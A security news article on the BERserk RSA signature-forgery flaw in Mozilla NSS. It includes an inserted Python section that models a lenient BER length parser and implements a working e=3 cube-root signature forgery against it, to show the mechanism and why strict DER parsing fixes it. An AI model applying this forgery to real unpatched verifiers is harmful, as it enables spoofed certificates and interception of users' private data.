Critical BERserk Flaw Opens Door to SSL Spoofing and MiTM Attacks

The Mozilla Network Security Services (NSS) crypto library has gone “BERserk,” as it were, with the discovery of a critical signature forgery vulnerability that allows RSA signatures to be forged without knowledge of the corresponding RSA private key.

The Intel Security Advanced Threat Research Team discovered the flaw and coined the name BERserk for it, noting that it could allow malicious parties to set up fraudulent sites that masquerade as legitimate businesses and other organizations protected by secure sockets layer (SSL) encryption.

For example, an attacker who can forge a certificate for a bank’s domain can interpose themselves between an end user and the bank’s website in a classic man-in-the-middle scenario. All personal data communicated in the browser session can be intercepted and/or tampered with, so both the integrity and confidentiality of the data exchanged in that session are at risk. To the user, though, it looks like an SSL-protected site, complete with the https:// address and padlock symbol in the address bar.

“This vulnerability allows for attackers to forge RSA signatures, thereby allowing for the bypass of authentication to websites utilizing SSL/TLS,” James Walter, director of advanced threat research of Intel Security, noted in an advisory. “Given that certificates can be forged for any domain, this issue raises serious concerns around integrity and confidentiality as we traverse what we perceive to be secure websites.”

The reach is fairly broad as well: while the Mozilla NSS library is best known from the Firefox web browser, it is also used in Thunderbird, SeaMonkey and other Mozilla products, as well as by Google Chrome and Chrome OS.

And why is it called BERserk, one might ask?

“This attack exploits a vulnerability in the parsing of ASN.1 encoded messages during signature verification; ASN.1 messages are made up of various parts that are encoded using BER (Basic Encoding Rules) and/or DER (Distinguished Encoding Rules),” Walter explained. “This attack exploits the fact that the length of a field in BER encoding can be made to use many bytes of data. In vulnerable implementations, these bytes are then skipped during parsing. This condition enables the attack.” 

The tactic is, interestingly, not new; this is a variant of Daniel Bleichenbacher’s PKCS#1 v1.5 RSA Signature Forgery vulnerability (CVE-2006-4339) from 2006.
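To make the mechanism concrete, here is an added, self-contained Python model; it is not Intel’s research code and not NSS’s implementation. It pairs a toy PKCS#1 v1.5 verifier whose “lenient” ASN.1 length decoder skips the surplus bytes of a long-form BER length (the condition quoted above; the decoder’s exact behaviour is this example’s model of it, not a description of NSS’s code) with a strict DER decoder that rejects them. The forgery itself is the low-exponent (e = 3) cube-root technique of Bleichenbacher’s attack, in the variant that fixes both a prefix and a suffix of the block so the uncontrolled bytes land exactly where the lenient parser skips them. The SHA-1 DigestInfo, the 1280-bit constructed modulus (chosen so the skipped bytes fit in one BER length field of at most 127 bytes), the message text and all function names are assumptions of this example.

```python
import hashlib

MOD_LEN = 160                       # bytes: a 1280-bit toy modulus (constructed below)
SHA1_OID = bytes.fromhex("2b0e03021a")
# DER DigestInfo for SHA-1 (35 bytes): 30 21 | 30 09 06 05 <OID> 05 00 | 04 14 <20-byte digest>
ALGID_TAIL = b"\x30\x09\x06\x05" + SHA1_OID + b"\x05\x00\x04\x14"

def read_length(buf, i, lenient):
    """ASN.1 length at buf[i] -> (length, index after it). Lenient mode is our toy
    model of the flaw described in the text (not NSS's actual code): a long-form
    length keeps only the last of its n bytes and skips the rest. Strict = DER."""
    first = buf[i]
    if first < 0x80:
        return first, i + 1
    n = first & 0x7F
    body = buf[i + 1:i + 1 + n]
    if n == 0 or len(body) != n: raise ValueError("bad long-form length")
    value = body[-1] if lenient else int.from_bytes(body, "big")  # lenient: n-1 bytes skipped
    if not lenient and (body[0] == 0 or value < 0x80): raise ValueError("non-minimal DER length")
    if i + 1 + n + value > len(buf): raise ValueError("length exceeds block")
    return value, i + 1 + n

def tlv(em, i, tag, lenient):
    if em[i] != tag: raise ValueError("expected tag %02x, got %02x" % (tag, em[i]))
    return read_length(em, i + 1, lenient)   # -> (length, index of the value)

def parse_digest_info(em, lenient):
    """Unpack a PKCS#1 v1.5 block 00 01 FF..FF 00 DigestInfo; return the digest."""
    if em[:2] != b"\x00\x01": raise ValueError("bad block type")
    i = 2
    while em[i] == 0xFF:
        i += 1
    if i < 10 or em[i] != 0x00: raise ValueError("bad padding")   # >= 8 FF bytes, then 00
    ln, i = tlv(em, i + 1, 0x30, lenient); outer_end = i + ln
    ln, i = tlv(em, i, 0x30, lenient); algo_end = i + ln
    ln, i = tlv(em, i, 0x06, lenient)
    if em[i:i + ln] != SHA1_OID: raise ValueError("unexpected digest OID")
    ln, i = tlv(em, i + ln, 0x05, lenient)
    if ln != 0 or i != algo_end: raise ValueError("bad AlgorithmIdentifier")
    ln, i = tlv(em, i, 0x04, lenient)
    if ln != 20 or i + ln != outer_end or i + ln != len(em):
        raise ValueError("DigestInfo does not fill the block")
    return em[i:i + ln]

def verify(sig, msg, n, lenient):
    em = pow(sig, 3, n).to_bytes(MOD_LEN, "big")      # RSA with e = 3
    try:
        return parse_digest_info(em, lenient) == hashlib.sha1(msg).digest()
    except (ValueError, IndexError):
        return False

def icbrt_ceil(n):
    """Smallest x with x**3 >= n: integer Newton iteration started above the root."""
    x = 1 << -(-n.bit_length() // 3)
    while (y := (2 * x + n // (x * x)) // 3) < x:
        x = y
    return x if x ** 3 >= n else x + 1

def forge_signature(prefix, suffix):
    """s with s**3 == prefix || <any bytes> || suffix, using no private key. Low k bits:
    cubing permutes odd residues mod 2^k, so invert it with exponent 3^-1 mod 2^(k-1).
    High bits: a rounded cube root of the shifted prefix; the cross terms stay far
    below the prefix because the fixed bytes cover well under 1/3 of the block."""
    k = 8 * len(suffix)
    S = int.from_bytes(suffix, "big")
    if S % 2 == 0: raise ValueError("suffix must end in an odd byte; pick another message")
    y = pow(S, pow(3, -1, 1 << (k - 1)), 1 << k)
    z = icbrt_ceil((int.from_bytes(prefix, "big") << 8 * (MOD_LEN - len(prefix))) >> 3 * k)
    s = (z << k) + y
    em = (s ** 3).to_bytes(MOD_LEN, "big")
    assert em.startswith(prefix) and em.endswith(suffix)
    return s

def pick_message(base):
    """Vary a trailing counter (think: certificate serial) until the digest is odd."""
    for ctr in range(256):
        msg = base + bytes([ctr])
        if hashlib.sha1(msg).digest()[-1] & 1:
            return msg
    raise RuntimeError("no odd digest found")

def berserk_style_pieces(msg):
    """Outer SEQUENCE length in long form: 113 skipped bytes, then 0x21 (the real length)."""
    n_skipped = MOD_LEN - 13 - 34                                  # 113 <= BER's 127 limit
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00\x30" + bytes([0x80 | (n_skipped + 1)])
    return prefix, b"\x21" + ALGID_TAIL + hashlib.sha1(msg).digest()

def toy_modulus():
    """Constructed 1280-bit odd integer standing in for an e = 3 public modulus (n > s**3)."""
    seed = hashlib.sha256(b"constructed toy modulus").digest() * (MOD_LEN // 32)
    return int.from_bytes(seed, "big") | (1 << (8 * MOD_LEN - 1)) | 1

def legit_block(msg):   # correct DER/PKCS#1 v1.5 block for the same digest; both parsers accept it
    di = b"\x30\x21" + ALGID_TAIL + hashlib.sha1(msg).digest()
    return b"\x00\x01" + b"\xff" * (MOD_LEN - 3 - len(di)) + b"\x00" + di

def demo():
    n, msg = toy_modulus(), pick_message(b"constructed to-be-signed data, serial ")
    s = forge_signature(*berserk_style_pieces(msg))
    return verify(s, msg, n, lenient=True), verify(s, msg, n, lenient=False)  # (True, False)
```

The point to take from `demo()`: the forged block parses cleanly and ends exactly where the lenient parser expects, so a check that the DigestInfo is the last thing in the block (the fix for the 2006 trailing-garbage variant) does not catch this one; rejecting non-minimal length encodings does. No private key is involved anywhere, so a real e = 3 key of the same size would verify the forgery the same way, which is why the only effective fix is in the verifier’s parser.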

“Upon discovery of this issue, our team engaged CERT/CC in an effort to ensure that all affected parties were responsibly and effectively notified and given proper guidance around this issue,” Intel added. “The Intel Security Advanced Threat Research team is continuing to work with CERT/CC in addition to reviewing other commonly used cryptographic libraries for this issue.”

Individual Firefox users can take immediate action by installing the latest update from Mozilla, and Google has also released updates for Chrome and Chrome OS. Because NSS also ships as a shared system library on many Linux distributions, servers and other applications that link against it need the distribution’s updated NSS package as well.
